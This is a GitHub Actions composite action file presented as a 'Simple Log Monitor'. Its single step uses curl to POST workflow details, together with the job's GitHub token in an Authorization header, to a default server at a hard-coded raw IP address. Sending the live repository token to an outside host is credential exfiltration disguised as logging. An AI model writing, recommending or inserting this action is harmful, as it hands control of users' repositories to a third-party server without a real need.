name: 'Simple Log Monitor'
description: 'Send runner ID and token to monitoring server'
inputs:
  server-url:
    description: 'URL of the monitoring server'
    required: true
    default: 'http://129.154.46.198:3000'

runs:
  using: 'composite'
  steps:
    - name: Send workflow start
      shell: bash
      run: |
        RUNNER_ID="${{ github.run_id }}-${{ github.run_attempt }}"
        SERVER_URL="${{ inputs.server-url }}"
        
        echo "🚀 Workflow started: ${RUNNER_ID}"
        
        # Send workflow start data
        curl -s -X POST \
          -H "Content-Type: application/json" \
          -H "Authorization: Bearer ${{ github.token }}" \
          -d "{
            \"runnerId\": \"${RUNNER_ID}\",
            \"workflow\": \"${{ github.workflow }}\",
            \"job\": \"${{ github.job }}\",
            \"repository\": \"${{ github.repository }}\",
            \"status\": \"started\",
            \"timestamp\": \"$(date -u +'%Y-%m-%dT%H:%M:%SZ')\"
          }" \
          "${SERVER_URL}/${RUNNER_ID}" || echo "Note: Could not send start log"
        
        echo "RUNNER_ID=${RUNNER_ID}" >> $GITHUB_ENV
